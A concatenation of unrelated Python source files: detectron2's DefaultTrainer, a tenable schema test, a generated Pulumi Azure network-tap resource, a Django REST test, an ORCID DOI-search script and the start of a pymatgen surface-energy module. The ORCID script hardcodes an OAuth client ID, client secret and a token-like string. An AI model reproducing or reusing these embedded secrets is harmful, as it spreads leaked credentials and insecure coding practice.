A trainer with default training logic. It does the following:
1. Create a :class:`SimpleTrainer` using model, optimizer, dataloader
defined by the given config. Create a LR scheduler defined by the config.
2. Load the last checkpoint or `cfg.MODEL.WEIGHTS`, if exists, when
`resume_or_load` is called.
3. Register a few common hooks defined by the config.
It is created to simplify the **standard model training workflow** and reduce code boilerplate
for users who only need the standard training workflow, with standard features.
It means this class makes *many assumptions* about your training logic that
may easily become invalid in a new research. In fact, any assumptions beyond those made in the
:class:`SimpleTrainer` are too much for research.
The code of this class has been annotated about restrictive assumptions it makes.
When they do not work for you, you're encouraged to:
1. Overwrite methods of this class, OR:
2. Use :class:`SimpleTrainer`, which only does minimal SGD training and
nothing else. You can then add your own hooks if needed. OR:
3. Write your own training loop similar to `tools/plain_train_net.py`.
See the :doc:`/tutorials/training` tutorials for more details.
Note that the behavior of this class, like other functions/classes in
this file, is not stable, since it is meant to represent the "common default behavior".
It is only guaranteed to work well with the standard models and training workflow in detectron2.
To obtain more stable behavior, write your own training logic with other public APIs.
Examples:
::
trainer = DefaultTrainer(cfg)
trainer.resume_or_load() # load last checkpoint or MODEL.WEIGHTS
trainer.train()
Attributes:
scheduler:
checkpointer (DetectionCheckpointer):
cfg (CfgNode):
"""
def __init__(self, cfg):
"""
Args:
cfg (CfgNode):
"""
super().__init__()
logger = logging.getLogger("detectron2")
if not logger.isEnabledFor(logging.INFO): # setup_logger is not called for d2
setup_logger()
cfg = DefaultTrainer.auto_scale_workers(cfg, comm.get_world_size())
# Assume these objects must be constructed in this order.
model = self.build_model(cfg)
optimizer = self.build_optimizer(cfg, model)
data_loader = self.build_train_loader(cfg)
model = create_ddp_model(model, broadcast_buffers=False)
self._trainer = (AMPTrainer if cfg.SOLVER.AMP.ENABLED else SimpleTrainer)(
model, data_loader, optimizer
)
self.scheduler = self.build_lr_scheduler(cfg, optimizer)
self.checkpointer = DetectionCheckpointer(
# Assume you want to save checkpoints together with logs/statistics
model,
cfg.OUTPUT_DIR,
trainer=weakref.proxy(self),
)
self.start_iter = 0
self.max_iter = cfg.SOLVER.MAX_ITER
self.cfg = cfg
self.register_hooks(self.build_hooks())
def resume_or_load(self, resume=True):
"""
If `resume==True` and `cfg.OUTPUT_DIR` contains the last checkpoint (defined by
a `last_checkpoint` file), resume from the file. Resuming means loading all
available states (eg. optimizer and scheduler) and update iteration counter
from the checkpoint. ``cfg.MODEL.WEIGHTS`` will not be used.
Otherwise, this is considered as an independent training. The method will load model
weights from the file `cfg.MODEL.WEIGHTS` (but will not load other states) and start
from iteration 0.
Args:
resume (bool): whether to do resume or not
"""
self.checkpointer.resume_or_load(self.cfg.MODEL.WEIGHTS, resume=resume)
if resume and self.checkpointer.has_checkpoint():
# The checkpoint stores the training iteration that just finished, thus we start
# at the next iteration
self.start_iter = self.iter + 1
def build_hooks(self):
"""
Build a list of default hooks, including timing, evaluation,
checkpointing, lr scheduling, precise BN, writing events.
Returns:
list[HookBase]:
"""
cfg = self.cfg.clone()
cfg.defrost()
cfg.DATALOADER.NUM_WORKERS = 0 # save some memory and time for PreciseBN
ret = [
hooks.IterationTimer(),
hooks.LRScheduler(),
hooks.PreciseBN(
# Run at the same freq as (but before) evaluation.
cfg.TEST.EVAL_PERIOD,
self.model,
# Build a new data loader to not affect training
self.build_train_loader(cfg),
cfg.TEST.PRECISE_BN.NUM_ITER,
)
if cfg.TEST.PRECISE_BN.ENABLED and get_bn_modules(self.model)
else None,
]
# Do PreciseBN before checkpointer, because it updates the model and need to
# be saved by checkpointer.
# This is not always the best: if checkpointing has a different frequency,
# some checkpoints may have more precise statistics than others.
if comm.is_main_process():
ret.append(hooks.PeriodicCheckpointer(self.checkpointer, cfg.SOLVER.CHECKPOINT_PERIOD))
def test_and_save_results():
self._last_eval_results = self.test(self.cfg, self.model)
return self._last_eval_results
# Do evaluation after checkpointer, because then if it fails,
# we can use the saved checkpoint to debug.
ret.append(hooks.EvalHook(cfg.TEST.EVAL_PERIOD, test_and_save_results))
if comm.is_main_process():
# Here the default print/log frequency of each writer is used.
# run writers in the end, so that evaluation metrics are written
ret.append(hooks.PeriodicWriter(self.build_writers(), period=20))
return ret
def build_writers(self):
"""
Build a list of writers to be used using :func:`default_writers()`.
If you'd like a different list of writers, you can overwrite it in
your trainer.
Returns:
list[EventWriter]: a list of :class:`EventWriter` objects.
"""
return default_writers(self.cfg.OUTPUT_DIR, self.max_iter)
def train(self):
"""
Run training.
Returns:
OrderedDict of results, if evaluation is enabled. Otherwise None.
"""
super().train(self.start_iter, self.max_iter)
if len(self.cfg.TEST.EXPECTED_RESULTS) and comm.is_main_process():
assert hasattr(
self, "_last_eval_results"
), "No evaluation results obtained during training!"
verify_results(self.cfg, self._last_eval_results)
return self._last_eval_results
def run_step(self):
self._trainer.iter = self.iter
self._trainer.run_step()
@classmethod
def build_model(cls, cfg):
"""
Returns:
torch.nn.Module:
It now calls :func:`detectron2.modeling.build_model`.
Overwrite it if you'd like a different model.
"""
model = build_model(cfg)
logger = logging.getLogger(__name__)
logger.info("Model:\n{}".format(model))
return model
@classmethod
def build_optimizer(cls, cfg, model):
"""
Returns:
torch.optim.Optimizer:
It now calls :func:`detectron2.solver.build_optimizer`.
Overwrite it if you'd like a different optimizer.
"""
return build_optimizer(cfg, model)
@classmethod
def build_lr_scheduler(cls, cfg, optimizer):
"""
It now calls :func:`detectron2.solver.build_lr_scheduler`.
Overwrite it if you'd like a different scheduler.
"""
return build_lr_scheduler(cfg, optimizer)
@classmethod
def build_train_loader(cls, cfg):
"""
Returns:
iterable
It now calls :func:`detectron2.data.build_detection_train_loader`.
Overwrite it if you'd like a different data loader.
"""
return build_detection_train_loader(cfg)
@classmethod
def build_test_loader(cls, cfg, dataset_name):
"""
Returns:
iterable
It now calls :func:`detectron2.data.build_detection_test_loader`.
Overwrite it if you'd like a different data loader.
"""
return build_detection_test_loader(cfg, dataset_name)
@classmethod
def build_evaluator(cls, cfg, dataset_name):
"""
Returns:
DatasetEvaluator or None
It is not implemented by default.
"""
raise NotImplementedError(
"""
If you want DefaultTrainer to automatically run evaluation,
please implement `build_evaluator()` in subclasses (see train_net.py for example).
Alternatively, you can call evaluation functions yourself (see Colab balloon tutorial for example).
"""
)
@classmethod
def test(cls, cfg, model, evaluators=None):
"""
Args:
cfg (CfgNode):
model (nn.Module):
evaluators (list[DatasetEvaluator] or None): if None, will call
:meth:`build_evaluator`. Otherwise, must have the same length as
``cfg.DATASETS.TEST``.
Returns:
dict: a dict of result metrics
"""
logger = logging.getLogger(__name__)
if isinstance(evaluators, DatasetEvaluator):
evaluators = [evaluators]
if evaluators is not None:
assert len(cfg.DATASETS.TEST) == len(evaluators), "{} != {}".format(
len(cfg.DATASETS.TEST), len(evaluators)
)
results = OrderedDict()
for idx, dataset_name in enumerate(cfg.DATASETS.TEST):
data_loader = cls.build_test_loader(cfg, dataset_name)
# When evaluators are passed in as arguments,
# implicitly assume that evaluators can be created before data_loader.
if evaluators is not None:
evaluator = evaluators[idx]
else:
try:
evaluator = cls.build_evaluator(cfg, dataset_name)
except NotImplementedError:
logger.warn(
"No evaluator found. Use `DefaultTrainer.test(evaluators=)`, "
"or implement its `build_evaluator` method."
)
results[dataset_name] = {}
continue
results_i = inference_on_dataset(model, data_loader, evaluator)
results[dataset_name] = results_i
if comm.is_main_process():
assert isinstance(
results_i, dict
), "Evaluator must return a dict on the main process. Got {} instead.".format(
results_i
)
logger.info("Evaluation results for {} in csv format:".format(dataset_name))
print_csv_format(results_i)
if len(results) == 1:
results = list(results.values())[0]
return results
@staticmethod
def auto_scale_workers(cfg, num_workers: int):
"""
When the config is defined for certain number of workers (according to
``cfg.SOLVER.REFERENCE_WORLD_SIZE``) that's different from the number of
workers currently in use, returns a new cfg where the total batch size
is scaled so that the per-GPU batch size stays the same as the
original ``IMS_PER_BATCH // REFERENCE_WORLD_SIZE``.
Other config options are also scaled accordingly:
* training steps and warmup steps are scaled inverse proportionally.
* learning rate are scaled proportionally, following :paper:`ImageNet in 1h`.
For example, with the original config like the following:
.. code-block:: yaml
IMS_PER_BATCH: 16
BASE_LR: 0.1
REFERENCE_WORLD_SIZE: 8
MAX_ITER: 5000
STEPS: (4000,)
CHECKPOINT_PERIOD: 1000
When this config is used on 16 GPUs instead of the reference number 8,
calling this method will return a new config with:
.. code-block:: yaml
IMS_PER_BATCH: 32
BASE_LR: 0.2
REFERENCE_WORLD_SIZE: 16
MAX_ITER: 2500
STEPS: (2000,)
CHECKPOINT_PERIOD: 500
Note that both the original config and this new config can be trained on 16 GPUs.
It's up to user whether to enable this feature (by setting ``REFERENCE_WORLD_SIZE``).
Returns:
CfgNode: a new config. Same as original if ``cfg.SOLVER.REFERENCE_WORLD_SIZE==0``.
"""
old_world_size = cfg.SOLVER.REFERENCE_WORLD_SIZE
if old_world_size == 0 or old_world_size == num_workers:
return cfg
cfg = cfg.clone()
frozen = cfg.is_frozen()
cfg.defrost()
assert (
cfg.SOLVER.IMS_PER_BATCH % old_world_size == 0
), "Invalid REFERENCE_WORLD_SIZE in config!"
scale = num_workers / old_world_size
bs = cfg.SOLVER.IMS_PER_BATCH = int(round(cfg.SOLVER.IMS_PER_BATCH * scale))
lr = cfg.SOLVER.BASE_LR = cfg.SOLVER.BASE_LR * scale
max_iter = cfg.SOLVER.MAX_ITER = int(round(cfg.SOLVER.MAX_ITER / scale))
warmup_iter = cfg.SOLVER.WARMUP_ITERS = int(round(cfg.SOLVER.WARMUP_ITERS / scale))
cfg.SOLVER.STEPS = tuple(int(round(s / scale)) for s in cfg.SOLVER.STEPS)
cfg.TEST.EVAL_PERIOD = int(round(cfg.TEST.EVAL_PERIOD / scale))
cfg.SOLVER.CHECKPOINT_PERIOD = int(round(cfg.SOLVER.CHECKPOINT_PERIOD / scale))
cfg.SOLVER.REFERENCE_WORLD_SIZE = num_workers # maintain invariant
logger = logging.getLogger(__name__)
logger.info(
f"Auto-scaling the config to batch_size={bs}, learning_rate={lr}, "
f"max_iter={max_iter}, warmup={warmup_iter}."
)
if frozen:
cfg.freeze()
return cfg
# Access basic attributes from the underlying trainer
for _attr in ["model", "data_loader", "optimizer"]:
setattr(
DefaultTrainer,
_attr,
property(
# getter
lambda self, x=_attr: getattr(self._trainer, x),
# setter
lambda self, value, x=_attr: setattr(self._trainer, x, value),
),
)
|
py | 7dfacf0c62f0477e0377a60996ece1e90ef2270c | '''tests for checker option schemas'''
import pytest
from marshmallow.exceptions import ValidationError
from tenable.ad.checker_option.schema import CheckerOptionSchema
@pytest.fixture
def checker_option_schema():
return [{
"id": 0,
"codename": "string",
"profileId": 0,
"checkerId": 0,
"directoryId": 0,
"value": "string",
"valueType": "string",
"name": "string",
"description": "string",
"staged": True,
"translations": ['string']
}]
def test_checker_option_schema(checker_option_schema):
test_response = [{
"id": 0,
"codename": "string",
"profileId": 0,
"checkerId": 0,
"directoryId": 0,
"value": "string",
"valueType": "string",
"name": "string",
"description": "string",
"staged": True
}]
schema = CheckerOptionSchema()
assert test_response[0]['name'] == schema.dump(schema.load(
checker_option_schema[0]))['name']
with pytest.raises(ValidationError):
checker_option_schema[0]['new_val'] = 1
schema.load(checker_option_schema[0])
|
py | 7dfad0015e3c523298ab28aae946646e2064e4fd | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['VirtualNetworkTap']
class VirtualNetworkTap(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
destination_load_balancer_front_end_ip_configuration: Optional[pulumi.Input[pulumi.InputType['FrontendIPConfigurationArgs']]] = None,
destination_network_interface_ip_configuration: Optional[pulumi.Input[pulumi.InputType['NetworkInterfaceIPConfigurationArgs']]] = None,
destination_port: Optional[pulumi.Input[int]] = None,
id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tap_name: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Virtual Network Tap resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['FrontendIPConfigurationArgs']] destination_load_balancer_front_end_ip_configuration: The reference to the private IP address on the internal Load Balancer that will receive the tap.
:param pulumi.Input[pulumi.InputType['NetworkInterfaceIPConfigurationArgs']] destination_network_interface_ip_configuration: The reference to the private IP Address of the collector nic that will receive the tap.
:param pulumi.Input[int] destination_port: The VXLAN destination port that will receive the tapped traffic.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[str] location: Resource location.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
:param pulumi.Input[str] tap_name: The name of the virtual network tap.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['destination_load_balancer_front_end_ip_configuration'] = destination_load_balancer_front_end_ip_configuration
__props__['destination_network_interface_ip_configuration'] = destination_network_interface_ip_configuration
__props__['destination_port'] = destination_port
__props__['id'] = id
__props__['location'] = location
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['tags'] = tags
__props__['tap_name'] = tap_name
__props__['etag'] = None
__props__['name'] = None
__props__['network_interface_tap_configurations'] = None
__props__['provisioning_state'] = None
__props__['resource_guid'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/latest:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20180801:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20181001:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20181101:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20181201:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20190201:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20190401:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20190601:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20190701:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20190801:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20191101:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20191201:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20200301:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20200401:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20200501:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20200601:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20200701:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20200801:VirtualNetworkTap")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(VirtualNetworkTap, __self__).__init__(
'azure-nextgen:network/v20190901:VirtualNetworkTap',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'VirtualNetworkTap':
"""
Get an existing VirtualNetworkTap resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return VirtualNetworkTap(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="destinationLoadBalancerFrontEndIPConfiguration")
def destination_load_balancer_front_end_ip_configuration(self) -> pulumi.Output[Optional['outputs.FrontendIPConfigurationResponse']]:
"""
The reference to the private IP address on the internal Load Balancer that will receive the tap.
"""
return pulumi.get(self, "destination_load_balancer_front_end_ip_configuration")
@property
@pulumi.getter(name="destinationNetworkInterfaceIPConfiguration")
def destination_network_interface_ip_configuration(self) -> pulumi.Output[Optional['outputs.NetworkInterfaceIPConfigurationResponse']]:
"""
The reference to the private IP Address of the collector nic that will receive the tap.
"""
return pulumi.get(self, "destination_network_interface_ip_configuration")
@property
@pulumi.getter(name="destinationPort")
def destination_port(self) -> pulumi.Output[Optional[int]]:
"""
The VXLAN destination port that will receive the tapped traffic.
"""
return pulumi.get(self, "destination_port")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="networkInterfaceTapConfigurations")
def network_interface_tap_configurations(self) -> pulumi.Output[Sequence['outputs.NetworkInterfaceTapConfigurationResponse']]:
"""
Specifies the list of resource IDs for the network interface IP configuration that needs to be tapped.
"""
return pulumi.get(self, "network_interface_tap_configurations")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state of the virtual network tap resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="resourceGuid")
def resource_guid(self) -> pulumi.Output[str]:
"""
The resource GUID property of the virtual network tap resource.
"""
return pulumi.get(self, "resource_guid")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
|
py | 7dfad002ce07e5ee2be8b2512a13fc24a9a4c04b | """
Feedback REST API Test
"""
import json
import logging
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITransactionTestCase
from ..models import Feedback
logger = logging.getLogger(__name__)
class FeedbackRestTestCases(APITransactionTestCase):
"""
Test Cases for Feedback REST API
"""
def setUp(self):
logger.warning('Start REST API test')
url = reverse('api:feedback-list')
data = {
'satisfaction': 'PR',
}
self.client.post(url, data, format='json')
self.exist_num = 1
def test_setup_is_valid(self):
"""
Make sure setup is valid
"""
url = reverse('api:feedback-list')
response = self.client.get(url, format='json')
# logger.warning(response.content)
self.assertEqual(len(json.loads(response.content)), self.exist_num)
def test_create_feedback_1(self):
"""
@Type
Positive
@Description
Ensure we can created a feedback by rest api.
"""
url = reverse('api:feedback-list')
feedback_sat = 'FR'
data = {'satisfaction': feedback_sat}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(
json.loads(response.content)['satisfaction'], feedback_sat)
# Get feedback list
response = self.client.get(url, format='json')
self.assertEqual(len(json.loads(response.content)), self.exist_num + 1)
# Check using db
self.assertEqual(Feedback.objects.count(), self.exist_num + 1)
|
py | 7dfad0d26d3e71bac0bc9b9fd10774afb0cdf397 | from collections import defaultdict
class DirectoryReport:
def __init__(self, files, mtime, scratch_disk):
self.size = 0
self.filetypes = defaultdict(int)
self.num_files = files
self.mtime = mtime
self.pi = None
self.group_name = None
self.scratch_disk = scratch_disk
|
py | 7dfad17c61f1f21f3360b4bfa3e35e6434caea02 | import grequests
import csv
import time
import sys
from oauthlib.oauth2 import BackendApplicationClient
from requests_oauthlib import OAuth2Session
from requests.auth import HTTPBasicAuth
class OrcidSearcher:
def __init__(self, accessToken, writer):
self.queue = []
self.writer = writer
self.accessToken = self.getToken()
self.headers = headers = {"Content-Type": "application/json",
"Authorization": "Bearer " + self.accessToken}
def getToken(self):
client_id = "APP-7JEN2756AHK9GJ2F"
client_secret = "7f0dbea9-1334-4013-b092-d3d65a194836"
scope = ['/read-public']
auth = HTTPBasicAuth(client_id, client_secret)
client = BackendApplicationClient(client_id=client_id)
oauth = OAuth2Session(client=client, scope=scope)
return oauth.fetch_token(token_url='https://orcid.org/oauth/token', auth=auth, scope=scope)["access_token"]
def search(self, coreId, doi):
if (len(self.queue) < 12):
self.queue.append([self.getSearchUrl(doi), doi, coreId])
else:
self.queue.append(self.getSearchUrl(doi))
requestset = (grequests.get(item[0], headers=self.headers) for item in self.queue)
startTime = time.time()
responses = grequests.map(requestset)
i = 0
for response in responses:
if not response:
print(response)
if response is not None and response.status_code >= 400:
self.accessToken = self.getToken()
self.headers = {"Content-Type": "application/json",
"Authorization": "Bearer " + self.accessToken}
print("Refreshing token...")
continue
i += 1
continue
if response.status_code >= 400:
exit()
data = response.json()
orcids = []
print()
if len(data['result'])>0:
print (data['result'])
for profile in data['result']:
orcids.append(profile['orcid-identifier']['uri'])
if orcids:
print("%d orcids found for %s doi %s" % (len(orcids), self.queue[i][2], self.queue[i][1]))
self.saveResults(self.queue[i][2], self.queue[i][1], orcids)
i += 1
endTime = time.time()
if (endTime - startTime < 1):
print("Ops, Hit the rate limit, sleep")
time.sleep(1)
self.queue = []
def getSearchUrl(self, doi):
return "https://pub.orcid.org/v2.1/search/?q=doi-self:%22" + doi + "%22"
def saveResults(self, coreId, doi, orcids):
for orcid in orcids:
row = (coreId, doi, orcid)
self.writer.writerow(row)
if __name__ == '__main__':
startfrom = int(sys.argv[2])
counter = 0
with open(sys.argv[1], 'r') as csvfiletoread:
spamreader = csv.reader(csvfiletoread, delimiter=',', quotechar='|')
with open('results/'+sys.argv[1], 'w') as csvfile:
writer = csv.writer(csvfile, delimiter=',', quoting=csv.QUOTE_MINIMAL)
searcher = OrcidSearcher('aa986fc3-621f-4822-8346-2e0ee20108ef', writer)
for row in spamreader:
counter += 1
if counter >=startfrom:
if len(row)>1:
searcher.search(row[0], row[1])
print("Completed: " + str(counter))
|
py | 7dfad186d82f3a1fca04407a9b8946ad7bc79761 | # Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
This module defines tools to analyze surface and adsorption related
quantities as well as related plots. If you use this module, please
consider citing the following works::
R. Tran, Z. Xu, B. Radhakrishnan, D. Winston, W. Sun, K. A. Persson,
S. P. Ong, "Surface Energies of Elemental Crystals", Scientific
Data, 2016, 3:160080, doi: 10.1038/sdata.2016.80.
and
Kang, S., Mo, Y., Ong, S. P., & Ceder, G. (2014). Nanoscale
stabilization of sodium oxides: Implications for Na-O2 batteries.
Nano Letters, 14(2), 1016–1020. https://doi.org/10.1021/nl404557w
and
Montoya, J. H., & Persson, K. A. (2017). A high-throughput framework
for determining adsorption energies on solid surfaces. Npj
Computational Materials, 3(1), 14.
https://doi.org/10.1038/s41524-017-0017-z
TODO:
-Still assumes individual elements have their own chempots
in a molecular adsorbate instead of considering a single
chempot for a single molecular adsorbate. E.g. for an OH
adsorbate, the surface energy is a function of delu_O and
delu_H instead of delu_OH
-Need a method to automatically get chempot range when
dealing with non-stoichiometric slabs
-Simplify the input for SurfaceEnergyPlotter such that the
user does not need to generate a dict
"""
import copy
import itertools
import random
import warnings
import numpy as np
from sympy import Symbol
from sympy.solvers import linsolve, solve
from pymatgen.analysis.wulff import WulffShape
from pymatgen.core.composition import Composition
from pymatgen.core.surface import get_slab_regions
from pymatgen.entries.computed_entries import ComputedStructureEntry
from pymatgen.io.vasp.outputs import Locpot, Outcar, Poscar
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
from pymatgen.util.plotting import pretty_plot
EV_PER_ANG2_TO_JOULES_PER_M2 = 16.0217656
__author__ = "Richard Tran"
__credits__ = "Joseph Montoya, Xianguo Li"
class SlabEntry(ComputedStructureEntry):
"""
A ComputedStructureEntry object encompassing all data relevant to a
slab for analyzing surface thermodynamics.
.. attribute:: miller_index
Miller index of plane parallel to surface.
.. attribute:: label
Brief description for this slab.
.. attribute:: adsorbates
List of ComputedStructureEntry for the types of adsorbates
..attribute:: clean_entry
SlabEntry for the corresponding clean slab for an adsorbed slab
..attribute:: ads_entries_dict
Dictionary where the key is the reduced composition of the
adsorbate entry and value is the entry itself
"""
def __init__(
self,
structure,
energy,
miller_index,
correction=0.0,
parameters=None,
data=None,
entry_id=None,
label=None,
adsorbates=None,
clean_entry=None,
marker=None,
color=None,
):
"""
Make a SlabEntry containing all relevant surface thermodynamics data.
Args:
structure (Slab): The primary slab associated with this entry.
energy (float): Energy from total energy calculation
miller_index (tuple(h, k, l)): Miller index of plane parallel
to surface
correction (float): See ComputedSlabEntry
parameters (dict): See ComputedSlabEntry
data (dict): See ComputedSlabEntry
entry_id (obj): See ComputedSlabEntry
data (dict): See ComputedSlabEntry
entry_id (str): See ComputedSlabEntry
label (str): Any particular label for this slab, e.g. "Tasker 2",
"non-stoichiometric", "reconstructed"
adsorbates ([ComputedStructureEntry]): List of reference entries
for the adsorbates on the slab, can be an isolated molecule
(e.g. O2 for O or O2 adsorption), a bulk structure (eg. fcc
Cu for Cu adsorption) or anything.
clean_entry (ComputedStructureEntry): If the SlabEntry is for an
adsorbed slab, this is the corresponding SlabEntry for the
clean slab
marker (str): Custom marker for gamma plots ("--" and "-" are typical)
color (str or rgba): Custom color for gamma plots
"""
self.miller_index = miller_index
self.label = label
self.adsorbates = [] if not adsorbates else adsorbates
self.clean_entry = clean_entry
self.ads_entries_dict = {str(list(ads.composition.as_dict().keys())[0]): ads for ads in self.adsorbates}
self.mark = marker
self.color = color
super().__init__(
structure,
energy,
correction=correction,
parameters=parameters,
data=data,
entry_id=entry_id,
)
def as_dict(self):
"""
Returns dict which contains Slab Entry data.
"""
d = {"@module": type(self).__module__, "@class": type(self).__name__}
d["structure"] = self.structure
d["energy"] = self.energy
d["miller_index"] = self.miller_index
d["label"] = self.label
d["adsorbates"] = self.adsorbates
d["clean_entry"] = self.clean_entry
return d
def gibbs_binding_energy(self, eads=False):
"""
Returns the adsorption energy or Gibb's binding energy
of an adsorbate on a surface
Args:
eads (bool): Whether to calculate the adsorption energy
(True) or the binding energy (False) which is just
adsorption energy normalized by number of adsorbates.
"""
n = self.get_unit_primitive_area
Nads = self.Nads_in_slab
BE = (self.energy - n * self.clean_entry.energy) / Nads - sum(ads.energy_per_atom for ads in self.adsorbates)
return BE * Nads if eads else BE
def surface_energy(self, ucell_entry, ref_entries=None):
"""
Calculates the surface energy of this SlabEntry.
Args:
ucell_entry (entry): An entry object for the bulk
ref_entries (list: [entry]): A list of entries for each type
of element to be used as a reservoir for nonstoichiometric
systems. The length of this list MUST be n-1 where n is the
number of different elements in the bulk entry. The chempot
of the element ref_entry that is not in the list will be
treated as a variable.
Returns (Add (Sympy class)): Surface energy
"""
# Set up
ref_entries = [] if not ref_entries else ref_entries
# Check if appropriate ref_entries are present if the slab is non-stoichiometric
# TODO: There should be a way to identify which specific species are
# non-stoichiometric relative to the others in systems with more than 2 species
slab_comp = self.composition.as_dict()
ucell_entry_comp = ucell_entry.composition.reduced_composition.as_dict()
slab_clean_comp = Composition({el: slab_comp[el] for el in ucell_entry_comp.keys()})
if slab_clean_comp.reduced_composition != ucell_entry.composition.reduced_composition:
list_els = [list(entry.composition.as_dict().keys())[0] for entry in ref_entries]
if not any(el in list_els for el in ucell_entry.composition.as_dict().keys()):
warnings.warn("Elemental references missing for the non-dopant species.")
gamma = (Symbol("E_surf") - Symbol("Ebulk")) / (2 * Symbol("A"))
ucell_comp = ucell_entry.composition
ucell_reduced_comp = ucell_comp.reduced_composition
ref_entries_dict = {str(list(ref.composition.as_dict().keys())[0]): ref for ref in ref_entries}
ref_entries_dict.update(self.ads_entries_dict)
# Calculate Gibbs free energy of the bulk per unit formula
gbulk = ucell_entry.energy / ucell_comp.get_integer_formula_and_factor()[1]
# First we get the contribution to the bulk energy
# from each element with an existing ref_entry.
bulk_energy, gbulk_eqn = 0, 0
for el, ref in ref_entries_dict.items():
N, delu = self.composition.as_dict()[el], Symbol("delu_" + str(el))
if el in ucell_comp.as_dict().keys():
gbulk_eqn += ucell_reduced_comp[el] * (delu + ref.energy_per_atom)
bulk_energy += N * (Symbol("delu_" + el) + ref.energy_per_atom)
# Next, we add the contribution to the bulk energy from
# the variable element (the element without a ref_entry),
# as a function of the other elements
for ref_el in ucell_comp.as_dict().keys():
if str(ref_el) not in ref_entries_dict.keys():
break
refEperA = (gbulk - gbulk_eqn) / ucell_reduced_comp.as_dict()[ref_el]
bulk_energy += self.composition.as_dict()[ref_el] * refEperA
se = gamma.subs(
{
Symbol("E_surf"): self.energy,
Symbol("Ebulk"): bulk_energy,
Symbol("A"): self.surface_area,
}
)
return float(se) if type(se).__name__ == "Float" else se
@property
def get_unit_primitive_area(self):
"""
Returns the surface area of the adsorbed system per
unit area of the primitive slab system.
"""
A_ads = self.surface_area
A_clean = self.clean_entry.surface_area
n = A_ads / A_clean
return n
@property
def get_monolayer(self):
"""
Returns the primitive unit surface area density of the
adsorbate.
"""
